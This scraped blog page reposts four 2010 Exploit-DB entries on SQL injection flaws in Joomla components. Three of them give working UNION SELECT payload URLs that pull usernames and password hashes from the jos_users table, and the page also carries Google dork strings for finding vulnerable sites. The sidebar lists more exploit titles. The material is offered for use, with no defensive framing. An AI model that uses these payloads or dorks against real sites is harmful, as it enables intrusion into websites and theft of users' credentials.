# Title: Joomla Component com_gameserver SQL Injection Vulnerability
# EDB-ID: 11222
# CVE-ID: ()
# OSVDB-ID: ()
# Author: B-HUNT3|2
# Published: 2010-01-22
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print?
# Exploit Title: Joomla (com_gameserver) SQL Injection Vulnerability
# Date: 2010-01-22
# Author: B-Hunt3|2
# Software Link: http://joomlacode.org/gf/project/gameserver/frs/
# Version: 1.2
# CVE : N/A
[~]>> …[BEGIN ADVISORY]…
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> TITLE: Joomla (com_gameserver) SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> [...]
All about information from internet
You can get some information about internet from here
23
Jan
no comment
23
Jan
# Title: Joomla (com_avosbillets) SQL injection Vulnerability
# EDB-ID: 11223
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Snakespc
# Published: 2010-01-22
# Verified: no
# Download Exploit Code
# Download N/A
view source
print?
#——————————————————–
#Joomla (com_avosbillets) SQL injection Vulnerability
#——————————————————–
#Discovered By: Snakespc ALGERIAN HaCkEr
#Mail: snakespc@gmail.com
#site:anti-sec.info/vb/index.php
#——————————————————-
#Dork:inurl”com_avosbillets”
#Exploit:
#——–
#PoC:
#http://server/index.php?option=com_avosbillets&task=view&view=event&id=-463+union+select+1,concat(username,0×3a,password),3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users–
———————————————————-
23
Jan
# Title: Joomla Component com_gurujibook SQL injection Vulnerability
# EDB-ID: 11225
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Snakespc
# Published: 2010-01-22
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print?
#——————————————————–
#Joomla (com_gurujibook) SQL injection Vulnerability
#——————————————————–
#Discovered By: Snakespc ALGERIAN HaCkEr
#Mail: snakespc@gmail.com
#site:anti-sec.info/vb/index.php
#——————————————————-
#Dork:inurl”com_gurujibook”
#Exploit:
#——–
#Demo:
#http://server/index.php?option=com_gurujibook&task=showPDF&bookid=-32+union+all+select+concat(username,0×3a,password),2,3,4+from+jos_users–
23
Jan
# Title: Joomla Component com_biographies SQL injection Vulnerability
# EDB-ID: 11226
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Snakespc
# Published: 2010-01-22
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print?
#——————————————————–
#Joomla (com_biographies) SQL injection Vulnerability
#——————————————————–
#Discovered By: Snakespc ALGERIAN HaCkEr
#Mail: snakespc@gmail.com
#site:anti-sec.info/vb/index.php
#——————————————————-
#Dork:inurl”com_biographies”
#Exploit:
#——–
#Demo:
#http://server/index.php?option=com_biographies&task=showFile&biobookid=-5+union+all+select+1,2,3,concat(username,0×3a,password)+from+jos_users–
Top Search
Recent Posts
- PHP-Fusion Local File Inclusion Vulnerability
- Joomla Component (com_equipment) SQL Injection Vulnerability
- Joomla Component Jgrid 1.0 Local File Inclusion Vulnerability
- Joomla Component OnGallery SQL Injection Vulnerability
- 123 Flashchat version 7.8 Multiple Remote Vulnerabilities
- Cpanel v11.25 CSRF Add FTP Account Exploit
- EZ-Oscommerce 3.1 Remote File Upload
- Mayasan Portal v2.0 (haberdetay.asp) SQL Injection Vulnerability
- Joomla Component com_spa SQL Injection Vulnerability
- Ubuntu PAM MOTD Local Root Exploit
Visitor
Archives
- August 2010 (5)
- July 2010 (6)
- June 2010 (8)
- May 2010 (5)
- March 2010 (7)
- February 2010 (25)
- January 2010 (21)
- December 2009 (18)
- November 2009 (16)
- October 2009 (6)
- September 2009 (14)
- August 2009 (16)
- July 2009 (10)
- June 2009 (3)
- April 2009 (4)
- March 2009 (3)
- February 2009 (15)
- January 2009 (29)
- December 2008 (54)
- November 2008 (44)
- October 2008 (30)
Recent Entries
- PHP-Fusion Local File Inclusion Vulnerability
- Joomla Component (com_equipment) SQL Injection Vulnerability
- Joomla Component Jgrid 1.0 Local File Inclusion Vulnerability
- Joomla Component OnGallery SQL Injection Vulnerability
- 123 Flashchat version 7.8 Multiple Remote Vulnerabilities
- Cpanel v11.25 CSRF Add FTP Account Exploit
- EZ-Oscommerce 3.1 Remote File Upload
- Mayasan Portal v2.0 (haberdetay.asp) SQL Injection Vulnerability
- Joomla Component com_spa SQL Injection Vulnerability
- Ubuntu PAM MOTD Local Root Exploit
Recent Comments
- admin in Joomla 1.5.x (Token) Remote Admin Change Password …
- boinionfoky in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
- FXbee in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
- sam in Joomla 1.5.x (Token) Remote Admin Change Password …
- Wourpigurge in phpBB3 addon prime_quick_style GetAdmin Exploit
- laspadalsecoB in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
- slabbanyfam in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
- bah in Zen Cart 1.3.8 Remote SQL Execution Exploit
- sehummel in Joomla 1.5.x (Token) Remote Admin Change Password …
- sehummel in Joomla Component com_ContentBlogList SQL Injection…
Random Selection of Posts
- Set up Hotmail on the iPhone via Gmail
- Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit
- Joomla Component Ignite Gallery SQL Injection Vulnerability
- ArticleLive (blogs.php?Id) SQL Injection Vulnerability
- Joomla Component Gigcal SQL Injection Vulnerability
- Joomla (com_mochigames) SQL Injection Vulnerability
- Joomla Component EXP Shop (catid) SQL Injection Vulnerability
© 2008 All about information from internet is proudly powered by WordPress
Theme designed by MILD-INFO.COM
Theme designed by MILD-INFO.COM